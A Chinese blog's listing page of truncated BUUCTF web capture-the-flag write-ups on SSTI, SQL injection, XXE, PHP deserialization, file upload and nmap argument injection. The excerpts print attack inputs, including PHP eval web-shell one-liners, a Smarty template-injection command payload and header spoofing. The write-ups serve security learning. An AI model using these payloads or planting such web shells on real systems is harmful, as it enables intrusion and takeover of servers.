自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(94)
  • 收藏
  • 关注

原创 web buuctf [BSidesCF 2019]Kookie

知识点:cookiecookie 是一个非常具体的东西,指的就是浏览器里面能永久存储的一种数据。跟服务器没啥关系,仅仅是浏览器实现的一种数据存储功能。cookie由服务器生成,发送给浏览器,浏览器把cookie以KV形式存储到某个目录下的文本文件中,下一次请求同一网站时会把该cookie发送给服务器。1.开题:想复杂了--做了一堆工作,最后~2.提示:a.需要cookie b.以用户名admin登录添加cookie:username=adminflag{67eb.

2022-04-12 17:36:08 472

原创 web buuctf [GYCTF2020]FlaskApp

知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞1.开题2.提示flask了,那不得不试一试SSTI在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14综上存在SSTI3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...

2022-04-12 16:35:19 4320 1

原创 web buuctf [BJDCTF2020]EasySearch

知识点:Apache SSI漏洞Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞Apache SSI 远程命令执行漏洞 - MCY5 - 博客园1.开题:看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的,2.贴源码<?php ob_start(); functio.

2022-04-12 11:30:23 560

原创 web buuctf [BSidesCF 2019]Futurella1

1.开题:2.看源码:view-source:http://4f84c1e3-1cf0-4c9d-a28f-3e50eef5b426.node4.buuoj.cn:81/

2022-04-11 17:08:46 419

原创 web buuctf [0CTF 2016]piapiapia

知识点:1.反序列化字符串逃逸1.开题2.常规操作,看源码,查看robots.txt,disearch扫描抓包,用常规的sql注入测试了一下,没啥效果,disearch扫描也结束了,看了下disearch扫描有文件www.zip,是源码的一个包,下载下来3.查看源码,没有路由文件,从index.php看,加载了config.php(里面有flag值),profile.php(会话已经加载的情况下读取信息),都看了一下文件,register.php(注册),注册了一个账号试了试,链

2022-04-11 17:01:59 846

原创 web buuctf [极客大挑战 2019]FinalSQL

知识点:盲注1.开题最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注2.随便点个12345,用bp抓包,进行fuzz报错盲注,贴脚本# -*- coding: utf-8 -*-# @Author: jiaoben# @Date : 2020/05/03import reimport requestsimport stringurl = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd..

2022-04-08 18:11:29 1174

原创 web buuctf [SUCTF 2019]Pythonginx1

知识点:1.nignx 2.idna编码与utf-8编码的漏洞1.开题查看源码,整理代码:@app.route('/getUrl', methods=['GET', 'POST'])def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname //经过urlparse解析所得hostname不能为suctf.cc if ...

2022-04-08 15:16:38 5020

原创 web buuctf [CISCN2019 华东南赛区]Web11

知识点:1.SSTI(smarty模板)2.XFF1.开题:a.题目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系b.提示xff2.利用bp抓包,添加xff并尝试模板注入很明显存在SSTI3.改payload={system('ls')}分别cat没有flag猜测可能在目录下面'cat ../../../flag'(前面有几个../需要挨个试一下)flag{3941b25d-8279-47eb-...

2022-04-07 23:49:41 489

原创 web buuctf [NPUCTF2020]ReadlezPHP

知识点:assert()断言函数assert — 检查一个断言是否为 falseassert(mixed $assertion, Throwable $exception = ?): bool如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。1.开题:2.查看源代码 view-source:url在源码下面查看,获得源码<?php#error_reporting(0);class HelloPhp{ pub.

2022-04-07 17:36:29 385

原创 web buuctf [MRCTF2020]Ezpop1

知识点:1.魔法函数 2.文件包含漏洞1.开题,php代码审计Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Cr...

2022-04-07 16:04:53 583

原创 web buuctf [MRCTF2020]PYWebsite

知识点:XFF漏洞1.查看源代码存在flag.php文件,放入url中查看2.和ip有关,后端验证抓包,添加X-Forwarded-For=127.0.0.1,伪装访问ip为本地主机flag{99bd7d0f-62f2-4631-b688-31433132a466}

2022-04-07 00:17:49 2379

原创 web buuctf [SWPU2019]Web1

考点:无列名注入1.登录界面和注册界面,发现admin账号被注册了,fuzz也没爆出密码来;尝试注入,dirsearch也没东西,源码上也没啥东西最后注册了一个账号,登录进去随便填了填,申请过去这是广告详情看url上有个id,尝试着注入,也没发现啥问题,没有地方报错2.在广告申请栏的标题注入1',在查看广告详情fuzz,发现or和空格都被过滤了,#和--+也过滤了没法用order by空格我们可以用/**/绕过3.在标题处注入1'/*...

2022-04-06 17:04:02 419

原创 web buuctf [网鼎杯 2020 朱雀组]Nmap1

考点:namp注入参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客1.2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件我们直接用那道buu里的payload:' <?php eval($_POST["cmd"]);?> -oG zhuque.php '注入之后发现存在过滤,fuzz,过滤了php(1)利用<?=来代替.

2022-04-05 15:33:39 1732

原创 web buuctf [WesternCTF2018]shrine

考点:模板注入(flask)1.打开整理代码import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')//显示代码@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/')def shrine(shrine): def safe_jinja(

2022-04-04 23:37:51 1250

原创 web buuctf [De1CTF 2019]SSRF Me

打开是一团代码,整理后:! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport json reload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_k

2022-04-03 15:44:16 1202

原创 web buuctf [CISCN 2019 初赛]Love Math

知识点:hex2bin():将16进制转化为字符串; 传参漏洞;1.代码如下<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { ...

2022-04-02 16:18:27 408

原创 web buuctf [安洵杯 2019]easy_serialize_php

考点:反序列化逃逸这个题目是一道php代码审计题目,打开就是源码,<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr

2022-04-02 11:01:56 471

原创 web buuctf [ASIS 2019]Unicorn shop

考点:unicode1.2.查看源代码提示和utf-8有关系3.扫描啥的没有什么结果,想着用bp抓包进行sql注入提示这个,就是只能输入一个字符返回去看,前三个都是1个字符就能购买,只有第四个需要13374.尝试购买第四个,因为价格必须在1337以上,且必须是一个字符,在utf-8的编码条件下,Unicode - Compart可以利用该网站进行查找大于1337的字符,并且利用下面的utf编码,输入即可,其实汉语的万就行...

2022-04-01 11:38:20 283

原创 web buuctf [WUSTCTF2020]朴实无华

1.根据提示消息应该在头部2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件)访问3.根据头部查看请求头和响应头4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//...

2022-04-01 10:47:28 408

原创 web buuctf [BJDCTF2020]Cookie is so stable

1.2.查看hint页面源代码,提示关键在cookie3.用admin登录,之后刷新抓包,发现cookie:UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin第一个是友盟的,主要看cookie中的user4.cookie中的注入,我第一个想法就是ssti(模板注入)paylo

2022-03-31 17:13:47 525

原创 web buuctf [NCTF2019]Fake XML cookbook1

考点:XXE(XML External Entity Injection 即XML外部实体注入)1.界面随便填入信息,进行抓包2.分析请求头,有x-requests-with,可以知道请求是ajax请求(ajax 全名asyncjavascript and XML(异步JavaScript和XML))也就是通过xml进行数据传输https://xz.aliyun.com/t/6887#toc-0抓包更改xml<?xml version="1.0" encoding..

2022-03-31 15:40:48 697

原创 web buuctf [BJDCTF2020]Mark loves cat1

考点:1.git泄露2.变量覆盖1.打开靶机,先看robots.txt,并用dirsearch进行扫描 py dirsearch.py -u f190ddaf-3db0-48c2-a858-4accf0783a69.node4.buuoj.cn:81/ -e * -t 1 -x 429(使用dirsearch时,一定要设置好线程,不然扫不出来)扫描发现错在.git泄露2.利用githack把git文件抓下来 python2 GitHack.py http://f190

2022-03-30 17:08:02 934

原创 web buu [强网杯 2019]高明的黑客1

考点:脚本编写1.根据提示,查看源码 url+www.tar.gz,下载压缩包,发现是3002个php文件随便打开一个发现里面有传参$_GET()函数,里面有的直接接了eval,相当于直接执行了参数里面的值,但是经过审计代码发现,里面的很多参数都已经在代码里被赋值,所以我们需要从三千多个文件里找到有用的$_GET(),很显然通过人工寻找有一定难度,那么就需要我们编写脚本...

2022-03-30 00:05:56 368

原创 web buuctf [ Had a bad day]

考点:伪协议嵌套(伪协议的过滤器嵌套)1.打开页面,url上有get传参,category=2.尝试注入,1' ,1' or '1=1' 都不行,没有数据库报错3.尝试文件包含,利用php伪协议,尝试读取index.php,令category=php://filter/read=convert.base64-encode/resource=index.php根据提示,可以看出确实是文件包含,利用了include函数,include函数在没有找到文件时会爆出警告,有可能是文件名..

2022-03-28 16:11:59 664

原创 web buuctf [网鼎杯 2020 朱雀组]phpweb1

考点:反序列化;1.打开网页提示的是设置时区的问题,回显了时间,然后用bp进行抓包下面有两个参数,func和p,结合网页回显,func的值date应该是调用的函数,p是函数的参数,2.尝试令func=ehco,p=123可以看出后台调用了call_user_func()函数根据报错,及函数性质,函数调用时要在命名空间内,需要拼接类名,类名没法猜,需要看源码call_user_func 函数在命名空间下调用函数的问题_飞大米的博客-CSDN博客3.令func=sy.

2022-03-26 20:50:05 284

原创 web buuctf [GWCTF 2019]我有一个数据库1

1.直接放弃御剑了,在buu上扫不到,我自己登录先看了一下有没有robots.txt,有,但是没有扫到,我用了disearch,设置了s之后可以扫到了py dirsearch -u url -e * -s 1扫描出来

2022-03-26 00:09:05 3472

原创 web buuctf [GXYCTF2019]禁止套娃1

考点:1.git泄露2.无参RCE1.用御剑扫后台没扫到啥东西看robots.txt文本,也没有2.都这样了,考虑一下有没有可能存在.git泄露,(我装了两个版本的python,githack需要在python2下运行)index.php源码如下<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:.

2022-03-24 22:45:21 1765

原创 web buuctf [BJDCTF2020]The mystery of ip1

考点:ssti模板注入1.打开网页,先到hint里看有没有线索,查看源代码里面有一个注释内容是<!-- Do you know why i know your ip? -->应该是和ip的来源有关系,很有可能是和xff有关;查看flag,就是一个ip地址抓包后,在消息头添加X-Forwarded-For,设置参数值为1.1.1.1,发现回显出来的ip变成了1.1.1.12.怀疑可能存在xff注入,在后面加' 加or '1=1' 都回显的是本身的内容,联想是否存在模板

2022-03-24 15:56:10 909

原创 web buuctf [BUUCTF 2018]Online Tool1

考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞通过代码审计,传参是host,最后的输出对host利用namp扫描,主要函数就是$host = escapeshellarg($host);$host = escapeshellcmd($host);escapeshellarg():escapeshellarg(string$arg):string重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...

2022-03-24 13:11:25 2928

原创 web buuctf [BJDCTF2020]ZJCTF,不过如此

考点:正则匹配;正则-反向引用;preg_replace /e模式漏洞1.一路做buuctf下来,web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-CSDN博客和这题的思路一样,不做赘述,主要是利用php伪协议1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密) file=php://filter/read=convert..

2022-03-23 21:12:22 2000

原创 web buuctf [安洵杯 2019]easy_web1

考点:md5强类型绕过(字符串)一定要注意分析题目,要提高敏感源代码最上面是一大串的base64编码后的文字,应该是左上角图像的编码,(这时候就应该考虑到能不能对index.php进行回显)1.看链接上面有两个参数,一个是img,一个是fileimg的值是TXpVek5UTTFNbVUzTURabE5qYz0,进行base64解码MzUzNTM1MmU3MDZlNjc=;再进行base64解码3535352e706e67;16进制转字符串555.png.同样,对i..

2022-03-23 16:36:15 1066 3

原创 web buuctf [RoarCTF 2019]Easy Java1

考点: java web.xml配置文件漏洞漏洞:【漏洞公告】Java web.xml 信息泄漏漏洞 - 阿里云安全产品和技术 - 阿里云漏洞产生原因:通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取漏洞利用:通过找到web.xml文件,推断class文件的路径,最后直接cla

2022-03-22 17:45:47 2298

原创 web buuctf [GXYCTF2019]BabyUpload1

考点:.htaccess文件,抓包修改content-type文件上传漏洞1.如题:传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下:GIF89a?<script language="php">@eval($_POST[dd]);</script>2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htacces

2022-03-22 10:56:06 836

原创 web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1

考点:盲注(布尔注入);异或的使用1.输入1'提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入2. 输入1' or '1=1'#存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符;(看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等3.根据提示即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我

2022-03-20 19:52:49 1826

原创 web buuctf [GYCTF2020]Blacklist1

考点:堆叠注入;mysql查询语句handler1.进行注入测试:注入1' 提示语法错误;注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞;2.联合查询:1' union select 1# 回显过滤3.根据过滤事项,应该是堆叠查询a.1'; show tables;#b.1';show columns from FlagHere;#4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..

2022-03-18 19:36:42 1144

原创 web buuctf [GXYCTF2019]BabySQli1

知识点:联合注入(当联合查询不存在时,联合查询就会构造一个虚拟的数据)1.尝试在用户和密码选项中分别进行注入,1' or '1=1'# ;1 or 1=1#;。。。都无法注入2.再输入1',用户一栏存在报错,且输入为字符型,尝试报错注入,也不行(可以用bp的fuzz,效率高点,根据response,能够知道or和()都被过滤了);3.级联注入:在用户栏输入1' union select 1,2#报错Error: The used SELECT statements have a differ

2022-03-18 00:03:58 1448

原创 web buuctf [网鼎杯 2020 青龙组]AreUSerialz1

1.代码审计(魔法函数,序列化)2.成员变量关键字 public、protected、private代码粘贴如下:<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =

2022-03-17 11:31:17 807

原创 web buuctf [MRCTF2020]Ez_bypass1

考点:代码审计、弱类型比较I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg

2022-03-16 20:25:24 537

原创 web buuctf [极客大挑战 2019]HardSQL1

这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。考点:报错注入报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息,利用updatexml(1,concat(0x7e,database()),2)concat函数将里面内容连成字符串,与xpath的格式不符

2022-03-15 18:20:25 1973

原创 web buuctf [SUCTF 2019]CheckIn1

如图,应该是一个文件上传的题目;1.上传一句话木马:上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤2.改文件头GIF89a?<script language="php">eval($_post['a']);</script>上传后提示能够看到文件上传的路径,和文件所在位..

2022-03-15 11:19:48 1541

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除